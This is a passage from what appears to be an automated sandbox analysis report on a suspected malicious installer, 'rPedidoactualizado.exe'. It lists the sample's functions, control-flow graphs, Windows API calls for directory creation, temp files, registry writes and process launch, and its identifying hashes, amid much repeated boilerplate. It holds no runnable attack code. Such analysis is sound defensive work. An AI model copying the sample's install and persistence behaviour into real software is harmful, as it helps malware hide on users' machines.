                                          • Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd
                                          Similarity
                                          • API ID: DirectoryLibraryLoadSystemwsprintf
                                          • String ID: %s%S.dll$UXTHEME$\
                                          • API String ID: 2200240437-1946221925
                                          • Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                          • Instruction ID: 65f2176863960af248fb2a7cbd18121a9a3b282edca47cb762b3bdaa43f9a997
                                          • Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                          • Instruction Fuzzy Hash: 14F0217050121967CB10AB68DD0DFDB376CA700304F10447AB547F10D1EBBDDA65CB98

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 650 403116-40312d 651 403136-40313f 650->651 652 40312f 650->652 653 403141 651->653 654 403148-40314d 651->654 652->651 653->654 655 40315d-40316a call 40330e 654->655 656 40314f-403158 call 403324 654->656 660 403170-403174 655->660 661 4032fc 655->661 656->655 662 4032a7-4032a9 660->662 663 40317a-4031a0 GetTickCount 660->663 664 4032fe-4032ff 661->664 668 4032e9-4032ec 662->668 669 4032ab-4032ae 662->669 665 403304 663->665 666 4031a6-4031ae 663->666 667 403307-40330b 664->667 665->667 670 4031b0 666->670 671 4031b3-4031c1 call 40330e 666->671 672 4032f1-4032fa call 40330e 668->672 673 4032ee 668->673 669->665 674 4032b0 669->674 670->671 671->661 683 4031c7-4031d0 671->683 672->661 684 403301 672->684 673->672 675 4032b3-4032b9 674->675 678 4032bb 675->678 679 4032bd-4032cb call 40330e 675->679 678->679 679->661 687 4032cd-4032d9 call 405e3f 679->687 686 4031d6-4031f6 call 4067d2 683->686 684->665 692 4031fc-40320f GetTickCount 686->692 693 40329f-4032a1 686->693 694 4032a3-4032a5 687->694 695 4032db-4032e5 687->695 696 403211-403219 692->696 697 40325a-40325c 692->697 693->664 694->664 695->675 700 4032e7 695->700 701 403221-403252 MulDiv wsprintfW call 4052ff 696->701 702 40321b-40321f 696->702 698 403293-403297 697->698 699 40325e-403262 697->699 698->666 705 40329d 698->705 703 403264-40326b call 405e3f 699->703 704 403279-403284 699->704 700->665 709 403257 701->709 702->697 702->701 710 403270-403272 703->710 708 403287-40328b 704->708 705->665 708->686 711 403291 708->711 709->697 710->694 712 403274-403277 710->712 711->665 712->708
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd
                                          Similarity
                                          • API ID: CountTick$wsprintf
                                          • String ID: ... %d%%
                                          • API String ID: 551687249-2449383134
                                          • Opcode ID: e5ebdf3a3088b3206fd1fd2d7a2307a5c5a9c69b21f930b1953cca8bb268646f
                                          • Instruction ID: 204c6f4639eb8c290f7f343d6ac391169eef919077521cdf394e4ce58078bb87
                                          • Opcode Fuzzy Hash: e5ebdf3a3088b3206fd1fd2d7a2307a5c5a9c69b21f930b1953cca8bb268646f
                                          • Instruction Fuzzy Hash: 7A518931900219EBCB10DF65DA84A9F7FA8AB44366F1441BBED14B62C0D7789F50CBA9

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 713 4057ce-405819 CreateDirectoryW 714 40581b-40581d 713->714 715 40581f-40582c GetLastError 713->715 716 405846-405848 714->716 715->716 717 40582e-405842 SetFileSecurityW 715->717 717->714 718 405844 GetLastError 717->718 718->716
                                          APIs
                                          • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405811
                                          • GetLastError.KERNEL32 ref: 00405825
                                          • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040583A
                                          • GetLastError.KERNEL32 ref: 00405844
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd
                                          Similarity
                                          • API ID: ErrorLast$CreateDirectoryFileSecurity
                                          • String ID: C:\Users\user\Desktop
                                          • API String ID: 3449924974-1246513382
                                          • Opcode ID: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                          • Instruction ID: 32cc50e607dd20b61f2ed470817bc290d965520901a5db6b5155953f1fdd03ed
                                          • Opcode Fuzzy Hash: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                          • Instruction Fuzzy Hash: B1010872C10619DADF00AFA1C9447EFBBB8EF14355F00803AD945B6281E77896188FA9

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 719 405dbc-405dc8 720 405dc9-405dfd GetTickCount GetTempFileNameW 719->720 721 405e0c-405e0e 720->721 722 405dff-405e01 720->722 724 405e06-405e09 721->724 722->720 723 405e03 722->723 723->724
                                          APIs
                                          • GetTickCount.KERNEL32 ref: 00405DDA
                                          • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\rPedidoactualizado.exe",0040336A,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,004035B6), ref: 00405DF5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd
                                          Similarity
                                          • API ID: CountFileNameTempTick
                                          • String ID: "C:\Users\user\Desktop\rPedidoactualizado.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                          • API String ID: 1716503409-3234529918
                                          • Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                          • Instruction ID: 33897e7ea40e9bcc5f45ceb9d35bf1368e2cdd1c67b8b6f6c5069f2428d8a25f
                                          • Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                          • Instruction Fuzzy Hash: D4F03076610304FBEB009F69DD05F9FBBB8EB95710F10803AED40E7250E6B1AA54CBA4

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 729 402d44-402d6d call 406104 731 402d72-402d74 729->731 732 402d76-402d7c 731->732 733 402dec-402df0 731->733 734 402d98-402dad RegEnumKeyW 732->734 735 402d7e-402d80 734->735 736 402daf-402dc1 RegCloseKey call 406671 734->736 738 402dd0-402dde RegCloseKey 735->738 739 402d82-402d96 call 402d44 735->739 743 402de0-402de6 RegDeleteKeyW 736->743 744 402dc3-402dce 736->744 738->733 739->734 739->736 743->733 744->733
                                          APIs
                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd
                                          Similarity
                                          • API ID: Close$Enum
                                          • String ID:
                                          • API String ID: 464197530-0
                                          • Opcode ID: a4e23b119c2c64eb18a4fa0724f9b8d9fe0ec592ff9815e45bdb7592abe1cef3
                                          • Instruction ID: 4ebe2cb43181949e29f1e9fb79ae388d5d3e17bd3db4e8cfc4c1202d027f6d8e
                                          • Opcode Fuzzy Hash: a4e23b119c2c64eb18a4fa0724f9b8d9fe0ec592ff9815e45bdb7592abe1cef3
                                          • Instruction Fuzzy Hash: FB116A32500108FBDF02AB90CE49FEE7B7DAF44340F110076B905B51E1E7B59E21AB58
                                          APIs
                                            • Part of subcall function 00405C17: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsx2132.tmp,?,00405C8B,C:\Users\user\AppData\Local\Temp\nsx2132.tmp,C:\Users\user\AppData\Local\Temp\nsx2132.tmp,?,?,75923420,004059C9,?,C:\Users\user\AppData\Local\Temp\,75923420,00000000), ref: 00405C25
                                            • Part of subcall function 00405C17: CharNextW.USER32(00000000), ref: 00405C2A
                                            • Part of subcall function 00405C17: CharNextW.USER32(00000000), ref: 00405C42
                                          • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                            • Part of subcall function 004057CE: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405811
                                          • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen,?,00000000,000000F0), ref: 0040164D
                                          Strings
                                          • C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen, xrefs: 00401640
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd
                                          Similarity
                                          • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                          • String ID: C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen
                                          • API String ID: 1892508949-2712461677
                                          • Opcode ID: 9e5626dcab178d18660621b241e7a2734acb43fa84c417fb4ea69048e5d5e0e9
                                          • Instruction ID: 83f66e59323efd8676d207054edf3c08df55f1f8244358cc2c8da33562713246
                                          • Opcode Fuzzy Hash: 9e5626dcab178d18660621b241e7a2734acb43fa84c417fb4ea69048e5d5e0e9
                                          • Instruction Fuzzy Hash: 1811D031504500EBCF20BFA1CD0199E36A0EF15329B28493FFA45B22F1DB3E89919A5E
                                          APIs
                                          • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000002,?,00000000,?,?,: Completed,?,?,004063D9,80000002), ref: 004061AB
                                          • RegCloseKey.KERNELBASE(?,?,004063D9,80000002,Software\Microsoft\Windows\CurrentVersion,: Completed,: Completed,: Completed,00000000,halituses), ref: 004061B6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd
                                          Similarity
                                          • API ID: CloseQueryValue
                                          • String ID: : Completed
                                          • API String ID: 3356406503-2954849223
                                          • Opcode ID: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                          • Instruction ID: f8c60df0673843c4a96ed35a73ceba2ba355a7ad566f59c539dda5576aee505e
                                          • Opcode Fuzzy Hash: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                          • Instruction Fuzzy Hash: B301BC72500219EADF21CF50CC09EDB3BA8EB04360F01803AFD16A6191E778D964CBA4
                                          APIs
                                          • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4F28,Error launching installer), ref: 004058A9
                                          • CloseHandle.KERNEL32(?), ref: 004058B6
                                          Strings
                                          • Error launching installer, xrefs: 00405893
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd
                                          Similarity
                                          • API ID: CloseCreateHandleProcess
                                          • String ID: Error launching installer
                                          • API String ID: 3712363035-66219284
                                          • Opcode ID: c1804180a416b962a28ecbb96a8e49de5f878aa0b2aa8e9b50c45ca8c4f376c1
                                          • Instruction ID: b039bfc1fd8153a77b97507ee8e8b42fe9752dbefc529c56e43fdfa491991b30
                                          • Opcode Fuzzy Hash: c1804180a416b962a28ecbb96a8e49de5f878aa0b2aa8e9b50c45ca8c4f376c1
                                          • Instruction Fuzzy Hash: 6CE0B6F5600209BFFB00AF64ED09E7B7BACEB58605F058525BD51F2290D6B998148A78
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3c73a460384e056ff9d12a0a60f21d525f10071a0075d6a226261d218d3999c3
                                          • Instruction ID: 96c9f76e6636b9c2d25b0b1467c2954fc3cee1ad24e3c7ba74a0f8c29babf82b
                                          • Opcode Fuzzy Hash: 3c73a460384e056ff9d12a0a60f21d525f10071a0075d6a226261d218d3999c3
                                          • Instruction Fuzzy Hash: 9531C731D00205EACF21AFA1DE4899E7A71BF44354F24813BF115B61E1CBB98952DB69
                                          APIs
                                          • lstrlenW.KERNEL32(0040B5A8,00000023,?,00000000,00000002,00000011,00000002), ref: 0040242F
                                          • RegSetValueExW.KERNELBASE(?,?,?,?,0040B5A8,00000000,?,00000000,00000002,00000011,00000002), ref: 0040246F
                                          • RegCloseKey.KERNELBASE(?,?,?,0040B5A8,00000000,?,00000000,00000002,00000011,00000002), ref: 00402557
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd
                                          Similarity
                                          • API ID: CloseValuelstrlen
                                          • String ID:
                                          • API String ID: 2655323295-0
                                          • Opcode ID: 9ae16c367c641726b2c7cc81df632fbb5fa1d95dd1bb84893f35c5cbb6edaf58
                                          • Instruction ID: 82080937d165882f0efaaa77ae0bb3c7350c3cd8b3028382441b60bd8f3f090b
                                          • Opcode Fuzzy Hash: 9ae16c367c641726b2c7cc81df632fbb5fa1d95dd1bb84893f35c5cbb6edaf58
                                          • Instruction Fuzzy Hash: 60118171D00104BEEF10AFA5DE89EAEBAB4EB44754F11803BF504B71D1DBB88D419B28
                                          APIs
                                          • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040205D
                                          • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040206E
